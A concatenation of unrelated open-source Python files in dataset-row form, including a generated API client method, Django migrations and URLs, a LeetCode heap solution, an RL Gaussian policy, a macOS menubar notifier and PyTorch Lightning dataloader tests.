This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executables_available(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str s: search query (FIQL format), e.g. \"name==dev to prod*\"
:return: list[PromotionExecutableInfo]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_executables_available_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_executables_available_with_http_info(**kwargs) # noqa: E501
return data
def get_executables_available_with_http_info(self, **kwargs): # noqa: E501
"""Get available Promotions # noqa: E501
Get available Promotions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executables_available_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str s: search query (FIQL format), e.g. \"name==dev to prod*\"
:return: list[PromotionExecutableInfo]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['s'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_executables_available" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 's' in params:
query_params.append(('_s', params['s'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Access Token', 'Basic Authentication'] # noqa: E501
return self.api_client.call_api(
'/executables/promotions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[PromotionExecutableInfo]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| [
"[email protected]"
] | |
aa1bdb2b6f2dfc31f467de5d05807bbd3a3ac8c9 | 6138b65079150723e41812b1345001866eeec323 | /project.py | af6b2f1844c6d1749de71c454f280291881eebc0 | [] | no_license | sirinsu/GlobalAIHubPythonHomework | 6b62c20c1503e3fc9665729f02747d1ea2da8939 | 78598b0ef6105bef1c404bcd57a3313cf85cd568 | refs/heads/master | 2023-02-06T14:36:15.270897 | 2020-12-26T19:45:17 | 2020-12-26T19:45:17 | 324,580,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
"""Student Management System"""
def calculateFinalGrade(grades):#takes a dictionary including midterm, final and project grades then returns the final grade after some calculations.
midterm = int(grades.get('midterm'))
final = int(grades.get('final'))
project = int(grades.get('project'))
final_grade = (midterm * 30 / 100) + (final * 50 / 100) + (project * 20 / 100)
return final_grade
def determinePassingGrade(grade):
pass_grade = ""
if grade >= 90:
pass_grade = "AA"
elif grade <90 and grade >=70:
pass_grade = "BB"
elif grade < 70 and grade >= 50:
pass_grade = "CC"
elif grade <50 and grade >= 30:
pass_grade = "DD"
else:
pass_grade = "FF"
return pass_grade
def studentManagementSystem():
from random import randrange
attempts = 3
while attempts > 0:
name = input("Please enter your name..")
surname = input("Please enter your surname..")
if name == "" or surname == "":
print("Incorrect name or surname. Please enter both your name and surname correctly.")
attempts = attempts - 1
else:
break
if attempts == 0:
print("Please try again later.")
return
lessons = []
for i in range(1,6):
lesson = input("Please write the name of the course you want to take or write q to continiue.")
if lesson == 'q':
if len(lessons) < 3:
return('You failed in class')
else:
break
else:
lessons.append(lesson)
i = 1
print()
print("----- Lessons You Took -----")
for lesson in lessons:
print(f"Lesson {i} - {lesson}")
i = i + 1
while True:
try:
chosen_lesson = int(input(f"Please choose a lesson number to take exams.(1 - {len(lessons)})"))
if chosen_lesson < 1 or chosen_lesson > len(lessons):
print("Please choose a correct lesson number.")
else:
break
except:
print("Please choose a correct lesson number.")
lesson = lessons[chosen_lesson - 1]
#print(lesson)
midterm = randrange(101)
final = randrange(101)
project = randrange(101)
grades = {"midterm": midterm, 'final':final, 'project':project}
final_grade = calculateFinalGrade(grades)
note = determinePassingGrade(final_grade)
if note == "FF":
pass
else:
print(f"NOTE: {note}")
studentManagementSystem()
# In[ ]:
| [
"[email protected]"
] | |
f50186d3a30eb10b2fb458ea10a2d9f678be8509 | 72639248c287778e8395a16aedc1fcb8eddcff30 | /lancers/migrations/0002_auto_20201019_2106.py | 8c19a2d52a9bbacf2be01fdf6269dd949eff97be | [] | no_license | takashifuruya0/fmanage | b13d92a8df6a38f1148a73f5fe189bdea55efc54 | 6f7c3fcca1e12e280a4c603397eb5e9ba80ab9dc | refs/heads/master | 2023-03-10T15:32:45.597104 | 2023-01-17T14:29:35 | 2023-01-17T14:29:35 | 123,647,988 | 0 | 0 | null | 2023-02-16T01:30:56 | 2018-03-03T01:20:11 | Python | UTF-8 | Python | false | false | 1,712 | py | # Generated by Django 2.2.16 on 2020-10-19 12:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lancers', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='opportunity',
name='related_opportunity',
field=models.ManyToManyField(blank=True, related_name='_opportunity_related_opportunity_+', to='lancers.Opportunity', verbose_name='関連案件'),
),
migrations.AlterField(
model_name='opportunity',
name='date_proposal',
field=models.DateField(blank=True, null=True, verbose_name='提案日'),
),
migrations.AlterField(
model_name='opportunity',
name='date_proposed_delivery',
field=models.DateField(blank=True, null=True, verbose_name='提案納期'),
),
migrations.AlterField(
model_name='opportunity',
name='description_proposal',
field=models.TextField(blank=True, null=True, verbose_name='提案内容'),
),
migrations.AlterField(
model_name='opportunity',
name='num_proposal',
field=models.IntegerField(blank=True, null=True, verbose_name='提案件数'),
),
migrations.AlterField(
model_name='opportunity',
name='val',
field=models.IntegerField(verbose_name='報酬額(税込)'),
),
migrations.AlterField(
model_name='opportunity',
name='val_payment',
field=models.IntegerField(verbose_name='クライアント支払額(税込)'),
),
]
| [
"[email protected]"
] | |
afc6e981f257ec4d3f19dd62d8a23a64ddeaccfe | 1b9623eb1e19d4ce775fdee6dadfcb743f8aac10 | /deptx/mop/urls.py | 8f199cc9587fb4f576da54aab386f0b99bb4c9ba | [] | no_license | pombredanne/deptx | d4784a75245f0df9b776fbfeab2a68194d9889cc | a7bd33ca658ab17060d803b86e35ae84cbd9ff08 | refs/heads/master | 2021-01-22T08:38:41.330904 | 2013-11-13T13:59:53 | 2013-11-13T13:59:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py | from django.conf.urls import patterns, url
from mop import views
urlpatterns = patterns('',
url(r'^$', views.login, name='mop_login'),
url(r'intranet/$', views.index, name='mop_index'),
url(r'intranet/logout/', views.logout_view, name='mop_logout'),
url(r'intranet/rules/', views.rules, name='mop_rules'),
url(r'intranet/performance/', views.performance, name='mop_performance'),
url(r'intranet/forms/blank', views.forms_blank, name='mop_forms_blank'),
url(r'intranet/forms/signed', views.forms_signed, name='mop_forms_signed'),
url(r'intranet/forms/fill/(\d+)', views.form_fill, name='mop_forms_fill'),
url(r'intranet/documents/pool/', views.pool, name='mop_pool'),
url(r'intranet/documents/$', views.documents, name='mop_documents'),
url(r'intranet/document/([-\w]+)/provenance', views.provenance, name='mop_provenance'),
url(r'intranet/mail/inbox/', views.mail_inbox, name='mop_mail_inbox'),
url(r'intranet/mail/outbox/', views.mail_outbox, name='mop_mail_outbox'),
url(r'intranet/mail/trash/', views.mail_trash, name='mop_mail_trash'),
url(r'intranet/mail/draft/', views.mail_draft, name='mop_mail_draft'),
url(r'intranet/mail/view/(\d+)', views.mail_view, name='mop_mail_view'),
url(r'intranet/mail/trashing/(\d+)', views.mail_trashing, name='mop_mail_trashing'),
url(r'intranet/mail/untrashing/(\d+)', views.mail_untrashing, name='mop_mail_untrashing'),
url(r'intranet/mail/deleting/(\d+)', views.mail_deleting, name='mop_mail_deleting'),
url(r'intranet/mail/compose/$', views.mail_compose, name='mop_mail_compose'),
url(r'intranet/mail/compose/(\d+)', views.mail_edit, name='mop_mail_edit'),
url(r'intranet/mail/check/', views.mail_check, name='mop_mail_check'),
url(r'intranet/control/$', views.control, name='mop_control'),
)
| [
"[email protected]"
] | |
1fe2656260edd35919c9745fc47bafc67970c346 | c9c5463996bf9e2adcd4918857382121b0a5aa56 | /leetcode/堆/重构字符串.py | 0147b66b14e19194532f2ddae5788e111bc1a915 | [] | no_license | Da1anna/Data-Structed-and-Algorithm_python | fdf370c355248081990c57c1c8eb5e05c4781e2b | cce067ef4374128924018b00c5ea77d2e869a834 | refs/heads/master | 2022-12-27T13:24:36.084657 | 2020-10-13T02:39:39 | 2020-10-13T02:39:39 | 174,938,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,278 | py | '''
给定一个字符串S,检查是否能重新排布其中的字母,使得两相邻的字符不同。
若可行,输出任意可行的结果。若不可行,返回空字符串。
示例 1:
输入: S = "aab"
输出: "aba"
示例 2:
输入: S = "aaab"
输出: ""
注意:
S 只包含小写字母并且长度在[1, 500]区间内。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/reorganize-string
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
'''
'''
思路1:双指针交换法,遍历数组,当遇到一个字母与它之前一个不同时,从当前位置开始寻找一个可交换的字母,直到遍历完。
这个思路对 ‘baaba’就不行了,因为它无法将第一个b交换到后面
思路2:将每一类字母及其个数组合成一个元组,加入堆中,每次弹出两个不同的个数最多的字母,更新其个数,
重复直到弹完
'''
import heapq as hp
class Solution:
#双指针交换
def reorganizeString_demo(self, S: str) -> str:
lst = list(S)
for i in range(1, len(lst)):
if lst[i] == lst[i - 1]:
j = i+1
while j < len(lst) and lst[j] == lst[i]:
j += 1
if j < len(lst):
lst[i], lst[j] = lst[j], lst[i]
else:
return ''
return ''.join(lst)
#堆的巧用:一次性弹出两个元素
def reorganizeString(self, S: str) -> str:
#特判
if len(S) == 1:
return S
heap = [(-S.count(x),x) for x in set(S)]
for cnt,x in heap:
#这里的判断需要考虑len的奇偶
if -cnt >= (len(S)+1)//2 + 1:
return ''
hp.heapify(heap)
res = ''
while len(heap) >= 2:
cnt1, c1 = hp.heappop(heap)
cnt2, c2 = hp.heappop(heap)
res += c1 + c2
if cnt1 + 1:
hp.heappush(heap,(cnt1+1,c1))
if cnt2 + 1:
hp.heappush(heap,(cnt2+1,c2))
return res+heap[0][1] if heap else res
#测试
S = 'aaab'
res = Solution().reorganizeString(S)
print(res) | [
"[email protected]"
] | |
81c732330675c3664eaf16f1f79b56005c8f43b5 | ea8336d1d0ce8b70362a544a8cafd55189a47921 | /snmpagent_unity/unity_impl/StorageProcessorReadThroughput.py | d0944e72498dd8cef598fd5a9a8f7c6c92c30580 | [
"Apache-2.0"
] | permissive | emc-openstack/snmp-agent | d2697cc2b35bf614f8e7e6a09eaa7bdbba3f1d04 | 466cd3ac072cd3a67c85ae9a4d3c7da3ae7ec9fc | refs/heads/master | 2023-03-27T01:52:56.037323 | 2017-09-13T06:29:00 | 2017-09-13T06:29:00 | 124,860,756 | 2 | 1 | Apache-2.0 | 2019-10-04T23:00:47 | 2018-03-12T08:56:26 | Python | UTF-8 | Python | false | false | 301 | py | class StorageProcessorReadThroughput(object):
def read_get(self, name, idx_name, unity_client):
return unity_client.get_sp_block_read_iops(idx_name)
class StorageProcessorReadThroughputColumn(object):
def get_idx(self, name, idx, unity_client):
return unity_client.get_sps()
| [
"[email protected]"
] | |
661caf7b460c7daa1b1dcd64f2926900fa1374e5 | 2286b880df34e1bfabe79b3605de287040404560 | /02-02/todolist/task/urls.py | 97bdb244e32e547aaa634f5ef9fd3c9aa9311fa6 | [] | no_license | iklimah27/praxis-academy-2 | e5d8b08807980d6fd8ff6ab73caa6ea18083c7f8 | 925853b520c9a8d7a87d8980d7fedfa604d3b4c8 | refs/heads/master | 2022-12-25T01:54:45.572190 | 2020-10-15T07:22:06 | 2020-10-15T07:22:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from django.contrib import admin
from django.urls import path
from django.shortcuts import render
from . import views
urlpatterns = [
path('', views.index),
path('<id>/', views.detail),
path('<id>/delete/', views.delete),
]
| [
"[email protected]"
] | |
f7c6dff56a5dbfbd57c51b742a1f32e141403c38 | da2583af7a14f04aed029a79a79224547de4c1f2 | /rl/policy/gp_linear_mean.py | ba4a963f759f350f923730c7a4ecbcfa39d55142 | [] | no_license | yun-long/rl_prototype | 4b0af8b817ad1c8bc30a46d7fa2e8f5cd37f7ea1 | 0a86a097d58ce299da90ea346e074f20fe167a5d | refs/heads/master | 2020-04-23T15:37:49.498870 | 2019-02-18T11:28:21 | 2019-02-18T11:28:21 | 171,271,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | """
Gaussin policy, linear mean, constant variance
Reference: Jan Peters, A Survey on policy search for robotics
"""
import numpy as np
import time
from rl.policy.base import GaussianPolicy
class GPLinearMean(GaussianPolicy):
def __init__(self, env, featurizer):
#
self.env = env
#
self.num_features = featurizer.num_features
self.num_actions = env.action_space.shape[0]
self.featurizer = featurizer
#
self.Mu_theta = np.random.randn(self.num_features, self.num_actions) / np.sqrt(self.num_features)
self.Sigma_action = np.eye(self.num_actions) * 1e1 # for exploration in parameter space
super().__init__()
def predict_action(self, state):
"""
Exploration in action_space, used for Step-based usually.
:param state:
:return:
"""
featurized_state = self.featurizer.transform(state).T
Mu_action = np.dot(self.Mu_theta.T, featurized_state).reshape(self.num_actions)
try:
action = np.random.multivariate_normal(Mu_action, self.Sigma_action)
except:
raise ValueError
return action
def update_pg(self, alpha_coeff, theta_samples, advantanges):
pass
def update_wml(self, Weights, Phi, A):
T = Phi.shape[0]
phi = Phi.reshape((T, self.num_features))
Q = Weights.reshape(T)
Q = np.diag(Q)
A = A.reshape((T, self.num_actions))
theta_tmp1 = np.linalg.inv(np.dot(phi.T, np.dot(Q, phi)))
theta_tmp2 = np.dot(phi.T, np.dot(Q, A))
self.Mu_theta = np.dot(theta_tmp1, theta_tmp2).reshape(self.Mu_theta.shape)
#
Z = (np.sum(Weights)**2 - np.sum(Weights**2)) / np.sum(Weights)
nume_sum = 0
for i in range(len(Weights)):
tmp = np.outer((A[i] - np.dot(self.Mu_theta.T, phi[i, :])), (A[i] - np.dot(self.Mu_theta.T, phi[i, :])))
tmp = Weights[i] * tmp
nume_sum += tmp
self.Sigma_action = nume_sum / Z
def optimal_policy_demo(self, num_demos):
for i_demo in range(num_demos):
print("Optimal Policy Demo : ", i_demo)
state = self.env.reset()
while True:
action = self.predict_action(state)
next_state, rewards, done, _ = self.env.step(action)
state = next_state
self.env.render()
if done:
time.sleep(1)
break
self.env.render(close=True)
| [
"[email protected]"
] | |
0e8e943f02932271670514383a5e7afae1d4e102 | 02be54b8a9ab6813274ae18feb428d0d1405b0b0 | /profiles/urls.py | 3664a3b5302ffe8a588e8eb15f400198f80a55f9 | [] | no_license | paulloy/msp4-brazen-mma | 8ee98e2f2b12a4a24b14d30c1456233b02457dcd | 33a430d6c81bb44525469bcee1beaee7c92b3f58 | refs/heads/master | 2023-03-27T13:29:12.825997 | 2021-03-31T03:30:46 | 2021-03-31T03:30:46 | 341,317,874 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from django.urls import path
from . import views
urlpatterns = [
path('profile_delivery_info/',
views.profile_delivery_info, name='profile_delivery_info'),
path('profile_order_history/',
views.profile_order_history, name='profile_order_history'),
path('order_history/<order_number>',
views.order_history, name='order_history'),
]
| [
"[email protected]"
] | |
dd38fd11a56bf550fab0a93a602c8c020348595c | b58158b53e97775a63540a752b56783d80cf2ff7 | /menubarnotifier.py | 2a41f7e788e0eb8224065d97de104f5d5338e073 | [] | no_license | alexglasser/menubarnotifier | 334f6823a8c08f776ca9c1632c5ae09057fe2ec3 | 4f0b69a0ab9d5e4ca10dd6e0b0a5941a94fb8522 | refs/heads/master | 2021-01-19T20:14:51.074296 | 2014-09-24T02:14:40 | 2014-09-24T02:14:40 | 24,394,237 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,502 | py | #!/usr/bin/python
'''
menubarnotifier.py
Alex Glasser
September 23, 2014
Simple script to display a message in the Mac OS X menubar using PyObjC.
Make sure you have PyObjC installed - you can do this using MacPorts or Homebrew.
Call the script with the desired notification as argv[1]:
./menubarnotifier.py "Notification Text"
Suggested: Redirect stderr to /dev/null and run the script in the background:
./menubarnotifier.py "Notification Text" 2>/dev/null &
'''
from sys import argv
try:
from PyObjCTools import AppHelper
from Foundation import *
from AppKit import *
except ImportError:
print "Failed to import from PyObjC."
exit(-1)
start_time = NSDate.date()
class MenubarNotifier(NSObject):
state = 'ok'
def applicationDidFinishLaunching_(self, sender):
NSLog("Loaded successfully.")
# Get notification text from argv[1], if possible.
try:
display_text = " ".join(argv[1:])
except IndexError:
display_text = "Default Text"
NSLog("Notification is '{}'".format(display_text))
self.statusItem = NSStatusBar.systemStatusBar().statusItemWithLength_(NSVariableStatusItemLength)
self.statusItem.setTitle_(display_text) # argv[1] or "Default Text"
self.statusItem.setEnabled_(TRUE) # item is enabled for clicking
self.statusItem.setAction_('statusItemClicked:') # method called when statusItem is clicked
self.statusItem.setHighlightMode_(TRUE) # highlight the item when clicked
# Get the timer going
self.timer = NSTimer.alloc().initWithFireDate_interval_target_selector_userInfo_repeats_(start_time, 5.0, self, 'tick:', None, True)
NSRunLoop.currentRunLoop().addTimer_forMode_(self.timer, NSDefaultRunLoopMode)
self.timer.fire()
def tick_(self, notification):
NSLog("state is {}".format(self.state))
def statusItemClicked_(self, notification):
''' Closes the application when clicked '''
NSLog("Notification was clicked. Goodbye.")
AppHelper.stopEventLoop()
def main():
# Hide the dock icon
info = NSBundle.mainBundle().infoDictionary()
info["LSBackgroundOnly"] = "1"
app = NSApplication.sharedApplication()
delegate = MenubarNotifier.alloc().init()
app.setDelegate_(delegate)
AppHelper.runEventLoop()
if __name__ == "__main__":
try:
main()
except Exception as e:
print e
exit(-1)
| [
"[email protected]"
] | |
9671494c7376ad81448f1c2d11f7707cd3a46a2a | a28f52ac4b77599ab9a71fea6f98d322974b5875 | /YAAS/migrations/0023_auctionstatus_version.py | 89357412d6d56ffe2d4301d0b50a4bc7cfcf2229 | [] | no_license | dawitnida/Pythonidae | 3785c3473f585ff5dc3865155547a7de845336b4 | 4df225bdc55ffee6d6bd02f32956a84fe27749a8 | refs/heads/master | 2022-12-12T12:21:24.278144 | 2022-05-12T19:52:44 | 2022-05-12T19:52:44 | 24,888,914 | 1 | 2 | null | 2022-05-12T19:52:45 | 2014-10-07T12:19:02 | Python | UTF-8 | Python | false | false | 520 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import concurrency.fields
class Migration(migrations.Migration):
dependencies = [
('yaas', '0022_auto_20141101_2209'),
]
operations = [
migrations.AddField(
model_name='auctionstatus',
name='version',
field=concurrency.fields.IntegerVersionField(default=1, help_text='record revision number'),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
58f225e91c9707ccec4037ee3789c38ff19785e9 | 799a0af9c05deabe5d5250a10e480ec15ae0216e | /Xpath_test/xpath_test_10.py | 3c4e2e550651ef49c998f95a34ee15717ae8ac84 | [
"MIT"
] | permissive | waws520waws/waws_spider | 9b2be28834c08166463fe265e0f5c37a874369c8 | c6a5988121f32619a5c5134c09fdfd556c696fe7 | refs/heads/master | 2021-03-20T06:01:22.041937 | 2020-03-28T02:49:16 | 2020-03-28T02:49:16 | 247,183,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | from lxml import etree
"""
contains的使用:应用于一个标签的属性有多个值的情况,如果我们还是用之前的相等的模式,是匹配不到值的
"""
text = '''
<li class="li li-first"><a href="link.html">first item</a></li>
'''
html = etree.HTML(text)
result = html.xpath('//li[contains(@class, "li")]/a/text()')
print(result) | [
"[email protected]"
] | |
4bb2cddf7a70efd8f3dc3329932dd7882dbfab0e | 46a16d4d4054e6063d2f3ed07c79bbd34c520f3b | /tests/trainer/test_data_loading.py | e9d5d3cc047cb83b8c5f4675916634f6bfbab5e7 | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] | permissive | kaushikb11/pytorch-lightning | 123c90076d340214d8ba2f68b7a3138c2b30959d | 8a931732ae5135e3e55d9c7b7031d81837e5798a | refs/heads/master | 2023-08-25T09:07:02.245113 | 2021-08-22T18:50:10 | 2021-08-22T18:50:10 | 319,391,066 | 1 | 2 | Apache-2.0 | 2020-12-07T17:16:13 | 2020-12-07T17:16:12 | null | UTF-8 | Python | false | false | 11,953 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from re import escape
import pytest
from torch.utils.data import DataLoader, DistributedSampler
from torch.utils.data.sampler import BatchSampler, Sampler, SequentialSampler
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _TORCH_GREATER_EQUAL_1_7
from tests.helpers import BoringModel, RandomDataset
@pytest.mark.skipif(
sys.platform == "win32" and not _TORCH_GREATER_EQUAL_1_7, reason="Bad `torch.distributed` support on Windows"
)
@pytest.mark.parametrize("mode", (1, 2))
def test_replace_distributed_sampler(tmpdir, mode):
class IndexedRandomDataset(RandomDataset):
def __getitem__(self, index):
return self.data[index]
class CustomDataLoader(DataLoader):
def __init__(self, num_features, dataset, *args, **kwargs):
self.num_features = num_features
super().__init__(dataset, *args, **kwargs)
class FailureCustomDataLoader(DataLoader):
def __init__(self, num_features, dataset, *args, **kwargs):
super().__init__(dataset, *args, **kwargs)
class CustomBatchSampler(BatchSampler):
pass
class TestModel(BoringModel):
def __init__(self, numbers_test_dataloaders, mode):
super().__init__()
self._numbers_test_dataloaders = numbers_test_dataloaders
self._mode = mode
def test_step(self, batch, batch_idx, dataloader_idx=None):
return super().test_step(batch, batch_idx)
def on_test_start(self) -> None:
dataloader = self.trainer.test_dataloaders[0]
assert isinstance(dataloader, CustomDataLoader)
assert dataloader.batch_size is None
batch_sampler = dataloader.batch_sampler
assert isinstance(batch_sampler, CustomBatchSampler)
assert batch_sampler.batch_size == 1
assert batch_sampler.drop_last
assert isinstance(batch_sampler.sampler, DistributedSampler)
def create_dataset(self):
dataset = IndexedRandomDataset(32, 64)
batch_sampler = None
batch_size = 2
if self._mode == 2:
batch_size = 1
batch_sampler = CustomBatchSampler(SequentialSampler(dataset), batch_size=batch_size, drop_last=True)
dataloader_cls = CustomDataLoader
else:
dataloader_cls = FailureCustomDataLoader
return dataloader_cls(32, dataset, batch_size=batch_size, batch_sampler=batch_sampler)
def test_dataloader(self):
return [self.create_dataset()] * self._numbers_test_dataloaders
model = TestModel(2, mode)
model.test_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir, limit_test_batches=2, plugins="ddp_find_unused_parameters_false", num_processes=1
)
if mode == 1:
match = escape("missing attributes are ['num_features']")
with pytest.raises(MisconfigurationException, match=match):
trainer.test(model)
else:
trainer.test(model)
@pytest.mark.parametrize("num_workers", [0, 1])
def test_dataloader_warnings(num_workers):
class TestModel(BoringModel):
def on_train_start(self, *_) -> None:
raise SystemExit()
dl = DataLoader(RandomDataset(32, 64), num_workers=num_workers)
if hasattr(dl, "persistent_workers"):
if num_workers == 0:
warn_str = "Consider setting num_workers>0 and persistent_workers=True"
else:
warn_str = "Consider setting persistent_workers=True"
else:
warn_str = "Consider setting accelerator=ddp"
trainer = Trainer(accelerator="ddp_spawn")
with pytest.warns(UserWarning, match=warn_str), pytest.raises(SystemExit):
trainer.fit(TestModel(), dl)
def test_replace_sampler_raises():
trainer = Trainer()
with pytest.raises(ValueError, match="needs to subclass `torch.utils.data.DataLoader"):
trainer.replace_sampler(object(), object(), mode="fit")
def test_dataloaders_with_missing_keyword_arguments():
trainer = Trainer()
ds = RandomDataset(10, 20)
class TestDataLoader(DataLoader):
def __init__(self, dataset):
super().__init__(dataset)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
match = escape("missing arguments are ['batch_sampler', 'sampler', 'shuffle']")
with pytest.raises(MisconfigurationException, match=match):
trainer.replace_sampler(loader, sampler, mode="fit")
match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler', 'shuffle']")
with pytest.raises(MisconfigurationException, match=match):
trainer.replace_sampler(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, dataset, *args, **kwargs):
super().__init__(dataset)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
trainer.replace_sampler(loader, sampler, mode="fit")
trainer.replace_sampler(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, *foo, **bar):
super().__init__(*foo, **bar)
loader = TestDataLoader(ds)
sampler = SequentialSampler(ds)
trainer.replace_sampler(loader, sampler, mode="fit")
trainer.replace_sampler(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, num_feat, dataset, *args, shuffle=False):
self.num_feat = num_feat
super().__init__(dataset)
loader = TestDataLoader(1, ds)
sampler = SequentialSampler(ds)
match = escape("missing arguments are ['batch_sampler', 'sampler']")
with pytest.raises(MisconfigurationException, match=match):
trainer.replace_sampler(loader, sampler, mode="fit")
match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler']")
with pytest.raises(MisconfigurationException, match=match):
trainer.replace_sampler(loader, sampler, mode="predict")
class TestDataLoader(DataLoader):
def __init__(self, num_feat, dataset, **kwargs):
self.feat_num = num_feat
super().__init__(dataset)
loader = TestDataLoader(1, ds)
sampler = SequentialSampler(ds)
match = escape("missing attributes are ['num_feat']")
with pytest.raises(MisconfigurationException, match=match):
trainer.replace_sampler(loader, sampler, mode="fit")
match = escape("missing attributes are ['num_feat']")
with pytest.raises(MisconfigurationException, match=match):
trainer.replace_sampler(loader, sampler, mode="predict")
def test_replace_sampler_with_multiprocessing_context():
"""This test verifies that replace_sampler conserves multiprocessing context"""
train = RandomDataset(32, 64)
context = "spawn"
train = DataLoader(train, batch_size=32, num_workers=2, multiprocessing_context=context, shuffle=True)
trainer = Trainer()
new_data_loader = trainer.replace_sampler(train, SequentialSampler(train.dataset))
assert new_data_loader.multiprocessing_context == train.multiprocessing_context
def test_dataloader_reinit_for_subclass():
class CustomDataLoader(DataLoader):
def __init__(
self,
dataset,
batch_size=1,
shuffle=False,
sampler=None,
batch_sampler=None,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
timeout=0,
worker_init_fn=None,
dummy_kwarg=None,
):
super().__init__(
dataset,
batch_size,
shuffle,
sampler,
batch_sampler,
num_workers,
collate_fn,
pin_memory,
drop_last,
timeout,
worker_init_fn,
)
self.dummy_kwarg = dummy_kwarg
self.something_unrelated = 1
trainer = Trainer(num_processes=1, accelerator="ddp_cpu")
class CustomDummyObj:
sampler = None
result = trainer.auto_add_sampler(CustomDummyObj(), shuffle=True)
assert isinstance(result, CustomDummyObj), "Wrongly reinstantiated data loader"
dataset = list(range(10))
result = trainer.auto_add_sampler(CustomDataLoader(dataset), shuffle=True)
assert isinstance(result, DataLoader)
assert isinstance(result, CustomDataLoader)
assert result.dummy_kwarg is None
# Shuffled DataLoader should also work
result = trainer.auto_add_sampler(CustomDataLoader(dataset, shuffle=True), shuffle=True)
assert isinstance(result, DataLoader)
assert isinstance(result, CustomDataLoader)
assert result.dummy_kwarg is None
class CustomSampler(Sampler):
pass
# Should raise an error if existing sampler is being replaced
dataloader = CustomDataLoader(dataset, sampler=CustomSampler(dataset))
with pytest.raises(MisconfigurationException, match="will be replaced by `DistributedSampler`"):
trainer.auto_add_sampler(dataloader, shuffle=True)
def test_loader_detaching():
"""Checks that the loader has been resetted after the entrypoint"""
class LoaderTestModel(BoringModel):
def training_step(self, batch, batch_idx):
assert len(model.train_dataloader()) == 10
return super().training_step(batch, batch_idx)
def validation_step(self, batch, batch_idx):
assert len(model.val_dataloader()) == 10
return super().validation_step(batch, batch_idx)
def test_step(self, batch, batch_idx):
assert len(model.test_dataloader()) == 10
return super().test_step(batch, batch_idx)
def predict_step(self, batch, batch_idx, dataloader_idx=None):
assert len(model.predict_dataloader()) == 10
return super().predict_step(batch, batch_idx, dataloader_idx=dataloader_idx)
loader = DataLoader(RandomDataset(32, 10), batch_size=1)
model = LoaderTestModel()
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer = Trainer(fast_dev_run=1)
trainer.fit(model, loader, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.validate(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.predict(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
trainer.test(model, loader)
assert len(model.train_dataloader()) == 64
assert len(model.val_dataloader()) == 64
assert len(model.predict_dataloader()) == 64
assert len(model.test_dataloader()) == 64
| [
"[email protected]"
] | |
